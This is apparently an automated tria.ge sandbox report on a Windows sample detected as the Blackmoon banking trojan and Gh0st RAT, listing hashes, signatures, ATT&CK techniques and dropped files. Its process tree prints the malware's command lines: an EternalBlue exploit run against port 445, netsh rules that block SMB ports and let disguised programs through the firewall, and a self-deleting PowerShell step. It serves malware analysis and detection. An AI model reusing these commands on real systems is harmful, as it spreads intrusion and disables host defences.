Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
34s -
max time network
65s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
30/06/2024, 01:10
General
-
Target
5d87bd723f8267c3c0bef75f2b502321c518ac6a09696f3971ace53d0ba505cd.exe
-
Size
259KB
-
MD5
f9f5342074462fa1048fea806eef535f
-
SHA1
61c4e925d54b4e85564abb2a233b976306ee4e74
-
SHA256
5d87bd723f8267c3c0bef75f2b502321c518ac6a09696f3971ace53d0ba505cd
-
SHA512
5b1823ae6153f30e9c24b2240aea2610f5f05182ae66b933122721d312d8fae8ef8ca3cdfe03b4f316e12c7e45acfe0f1fcdd35f5b81748477f27477ce00b9b9
-
SSDEEP
6144:r+k9IKKJPa1DyKHC055swEUkezQ12rqyFWaiwV:ik9IKKJip9C0kmzQ12rqyQaX
Malware Config
Signatures
-
Blackmoon, KrBanker
Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.
-
Detect Blackmoon payload 8 IoCs
-
Gh0st RAT payload 12 IoCs
-
Gh0strat
Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.
-
Detects executables containing possible sandbox analysis VM usernames 4 IoCs
-
Detects executables embedding registry key / value combination indicative of disabling Windows Defender features 2 IoCs
-
UPX dump on OEP (original entry point) 10 IoCs
-
Boot or Logon Autostart Execution: Port Monitors 1 TTPs 2 IoCs
Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation.
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 12 IoCs
-
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 7 IoCs
-
UPX packed file 10 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Drops file in System32 directory 5 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 42 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Modifies data under HKEY_USERS 55 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\5d87bd723f8267c3c0bef75f2b502321c518ac6a09696f3971ace53d0ba505cd.exe"C:\Users\Admin\AppData\Local\Temp\5d87bd723f8267c3c0bef75f2b502321c518ac6a09696f3971ace53d0ba505cd.exe"1⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\MSSQLH.exeC:\Users\Admin\AppData\Local\Temp\MSSQLH.exe2⤵
- Boot or Logon Autostart Execution: Port Monitors
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\SysWOW64\svchost.exe"1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\Temp\MpMgSvc.exe"C:\WINDOWS\Temp\MpMgSvc.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\WINDOWS\Temp\Eternalblue-2.2.0.exeEternalblue-2.2.0.exe --TargetIp 10.127.0.243 --Target WIN72K8R2 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig LOG.txt3⤵
-
-
C:\WINDOWS\Temp\Eternalblue-2.2.0.exeEternalblue-2.2.0.exe --TargetIp 10.127.0.243 --Target WIN72K8R2 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig LOG.txt3⤵
-
-
-
C:\WINDOWS\Temp\Hooks.exe"C:\WINDOWS\Temp\Hooks.exe"2⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Block3⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=Filter13⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP3⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP3⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP3⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP3⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP3⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP3⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=FilteraAtion1 action=block3⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion13⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Block assign=y3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Sleep -s 2;del "C:\WINDOWS\Temp\Hooks.exe"3⤵
-
-
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\SysWOW64\svchost.exe -k GraphicsPerfSvcsGroup1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\system32\svchost.exe"2⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name=Microsoft_ctfmoon dir=in program=C:\Windows\Microsoft.NET\ctfmoon.exe action=allow2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name=Microsoft_ctfmoon dir=out program=C:\Windows\Microsoft.NET\ctfmoon.exe action=allow2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall set rule name=Microsoft_ctfmoon new enable=yes2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name=Microsoft_Edge dir=in program=C:\Windows\Microsoft.NET\Meson.exe action=allow2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name=Microsoft_Edge dir=out program=C:\Windows\Microsoft.NET\Meson.exe action=allow2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall set rule name=Microsoft_Edge new enable=yes2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name=Microsoft_Dcom dir=in program=C:\Windows\Microsoft.NET\traffmonetizer\traffmonetizer.exe action=allow2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name=Microsoft_Dcom dir=out program=C:\Windows\Microsoft.NET\traffmonetizer\traffmonetizer.exe action=allow2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall set rule name=Microsoft_Dcom new enable=yes2⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name=Microsoft_Store dir=in program=C:\WINDOWS\Microsoft.Net\Framework\v3.0\WmiPrvSER.exe action=allow2⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name=Microsoft_Store dir=out program=C:\WINDOWS\Microsoft.Net\Framework\v3.0\WmiPrvSER.exe action=allow2⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall set rule name=Microsoft_Store new enable=yes2⤵
- Modifies Windows Firewall
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Port Monitors
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Server Software Component
1Terminal Services DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
807KB
MD59a5cec05e9c158cbc51cdc972693363d
SHA1ca4d1bb44c64a85871944f3913ca6ccddfa2dc04
SHA256aceb27720115a63b9d47e737fd878a61c52435ea4ec86ba8e58ee744bc85c4f3
SHA5128af997c3095d728fe95eeedfec23b5d4a9f2ea0a8945f8c136cda3128c17acb0a6e45345637cf1d7a5836aaa83641016c50dbb59461a5a3fb7b302c2c60dfc94
-
Filesize
7KB
MD5497080fed2000e8b49ee2e97e54036b1
SHA14af3fae881a80355dd09df6e736203c30c4faac5
SHA256756f44f1d667132b043bfd3da16b91c9f6681e5d778c5f07bb031d62ff00d380
SHA5124f8bd09f9d8d332c436beb8164eec90b0e260b69230f102565298beff0db37265be1ae5eb70acf60e77d5589c61c7ee7f01a02d2a30ac72d794a04efef6f25df
-
Filesize
11.7MB
MD5422f3763021f8f9bfc31a9a7e4b049f9
SHA1d9b34b3cf62c66dd776ba5bed3abb0c409c6c3f0
SHA256a1871f4f0149065abab263411d6afdd8ae962060db732e740e956898b62cee0b
SHA51246ad02ef99385a98fd18479bf409caacf5b2f4a1d3beecfe7b85a5af893cec96a57fd8715c24bfed222e1e1dd480bd1ced0c398d5893e3d6d2caef65797bb6e0
-
Filesize
3.2MB
MD540670d0d30c6855dd2b3db30b81f9ce2
SHA11f553452c564af39945941dc850bf3e16ca72290
SHA256d34098c57d0588f6bdf79abd8af98e22904ba595e27a58966400f500688f34f3
SHA5128c2df4e2190437645e8c1f29cacd9a6b538dd6bd9a0697ad4a61455a712b8f051a773ebf47342014760c74881627c129b8b3597705cee1de5f634d0542816a2a
-
Filesize
6KB
MD5aec243ec4ce4542294598b176520e9c2
SHA15f880188f3481221500f06c2312c458cab5090f5
SHA25636667baed91df606b30ab8c01c9b3f82dc3bb1aed9a989c6dcada35478f85ec6
SHA512dba1c32db6328e21de0caba75474b9575d89fb9bc9ef56b8d45ccfcef00e540ce4d9329663233fecf6381ac21d7608a05ec8ac3c5e4c6bd1056442fa0ee2724f
-
Filesize
23.7MB
MD5eb72d63d5e250781fb1b84f185581e1e
SHA1262f689ab8a405404a0ed0fc876cfe8e4a0d6efb
SHA256440bbe8365019a7cec572f1f91159a6209636d4bf3fe3b85506bad0ff5097bc4
SHA512e02050a2e93d9c0f67c48c879d368b3a4d7a0a8bfcdc9a8c153dc1be87d809a5a20e95108721ce8194b80bc6dfd474a23474e503afc6ddd5c7c1dff23e62bcb1
-
Filesize
436KB
MD5214f53c5c0181d9e0531c48d46ed0881
SHA14d5629a5fbb29439b66caf98c5cec56730118ecd
SHA256224bf0bd119ef5c8aed25875cb66f62f9e2054dea8de5a3083cc43468a5da0da
SHA512a941ec678f6eb05c3c7692dc5b297ccea552e30b0cdab123111e39527fd51a2b9b16b9956ecfccf05193518bee5478d7562c5a4b4e0338016032e5384cb19c5a
-
Filesize
153KB
MD512682cac60b5927fb4a0d1f9ad28b5d3
SHA1bedaaee5b7af9f0c956fae5e19d354e30e9a75fe
SHA25689622226b6a14d9a5021ec33536f0c4ec39f733b204ab0eecbde2bc786bb4a41
SHA5125e907262376691907097e187b65d72036f7c0d52dcab7ffb0f5a34aea52e38304e2032d897d70a1e68a4e8649b2353b22611ded58de86333e45afebdf04f30c5
-
Filesize
126KB
MD58c80dd97c37525927c1e549cb59bcbf3
SHA14e80fa7d98c8e87facecdef0fc7de0d957d809e1
SHA25685b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5
SHA51250e9a3b950bbd56ff9654f9c2758721b181e7891384fb37e4836cf78422399a07e6b0bfab16350e35eb2a13c4d07b5ce8d4192fd864fb9aaa9602c7978d2d35e
-
Filesize
15KB
MD53c2fe2dbdf09cfa869344fdb53307cb2
SHA1b67a8475e6076a24066b7cb6b36d307244bb741f
SHA2560439628816cabe113315751e7113a9e9f720d7e499ffdd78acbac1ed8ba35887
SHA512d6b819643108446b1739cbcb8d5c87e05875d7c1989d03975575c7d808f715ddcce94480860828210970cec8b775c14ee955f99bd6e16f9a32b1d5dafd82dc8c
-
Filesize
10KB
MD5ba629216db6cf7c0c720054b0c9a13f3
SHA137bb800b2bb812d4430e2510f14b5b717099abaa
SHA25615292172a83f2e7f07114693ab92753ed32311dfba7d54fe36cc7229136874d9
SHA512c4f116701798f210d347726680419fd85880a8dc12bf78075be6b655f056a17e0a940b28bbc9a5a78fac99e3bb99003240948ed878d75b848854d1f9e5768ec9
-
Filesize
11KB
MD52f0a52ce4f445c6e656ecebbcaceade5
SHA135493e06b0b2cdab2211c0fc02286f45d5e2606d
SHA256cde45f7ff05f52b7215e4b0ea1f2f42ad9b42031e16a3be9772aa09e014bacdb
SHA51288151ce5c89c96c4bb086d188f044fa2d66d64d0811e622f35dceaadfa2c7c7c084dd8afb5f774e8ad93ca2475cc3cba60ba36818b5cfb4a472fc9ceef1b9da1
-
Filesize
232KB
MD5f0881d5a7f75389deba3eff3f4df09ac
SHA18404f2776fa8f7f8eaffb7a1859c19b0817b147a
SHA256ca63dbb99d9da431bf23aca80dc787df67bb01104fb9358a7813ed2fce479362
SHA512f266baecae0840c365fe537289a8bf05323d048ef3451ebffbe75129719c1856022b4bddd225b85b6661bbe4b2c7ac336aa9efdeb26a91a0be08c66a9e3fe97e
-
Filesize
58KB
MD5838ceb02081ac27de43da56bec20fc76
SHA1972ab587cdb63c8263eb977f10977fd7d27ecf7b
SHA2560259d41720f7084716a3b2bbe34ac6d3021224420f81a4e839b0b3401e5ef29f
SHA512bcca9e1e2f84929bf513f26cc2a7dc91f066e775ef1d34b0fb00a54c8521de55ef8c81f796c7970d5237cdeab4572dedfd2b138d21183cb19d2225bdb0362a22
-
Filesize
29KB
MD53e89c56056e5525bf4d9e52b28fbbca7
SHA108f93ab25190a44c4e29bee5e8aacecc90dab80c
SHA256b2a3172a1d676f00a62df376d8da805714553bb3221a8426f9823a8a5887daaa
SHA51232487c6bca48a989d48fa7b362381fadd0209fdcc8e837f2008f16c4b52ab4830942b2e0aa1fb18dbec7fce189bb9a6d40f362a6c2b4f44649bd98557ecddbb6
-
Filesize
9KB
MD583076104ae977d850d1e015704e5730a
SHA1776e7079734bc4817e3af0049f42524404a55310
SHA256cf25bdc6711a72713d80a4a860df724a79042be210930dcbfc522da72b39bb12
SHA512bd1e6c99308c128a07fbb0c05e3a09dbcf4cec91326148439210077d09992ebf25403f6656a49d79ad2151c2e61e6532108fed12727c41103df3d7a2b1ba82f8
-
Filesize
57KB
MD56b7276e4aa7a1e50735d2f6923b40de4
SHA1db8603ac6cac7eb3690f67af7b8d081aa9ce3075
SHA256f0df80978b3a563077def7ba919e2f49e5883d24176e6b3371a8eef1efe2b06a
SHA51258e65ce3a5bcb65f056856cfda06462d3fbce4d625a76526107977fd7a44d93cfc16de5f9952b8fcff7049a7556b0d35de0aa02de736f0daeec1e41d02a20daa
-
Filesize
828KB
-
Filesize
828KB
-
Filesize
68KB
-
Filesize
9.2MB
-
Filesize
24.0MB
-
Filesize
36KB
-
Filesize
24.0MB
-
Filesize
9.2MB
-
Filesize
9.2MB
-
Filesize
36KB
-
Filesize
36KB
-
Filesize
9.2MB
-
Filesize
9.2MB
-
Filesize
9.2MB
-
Filesize
9.2MB
-
Filesize
68KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
4KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
24.0MB
-
Filesize
24.0MB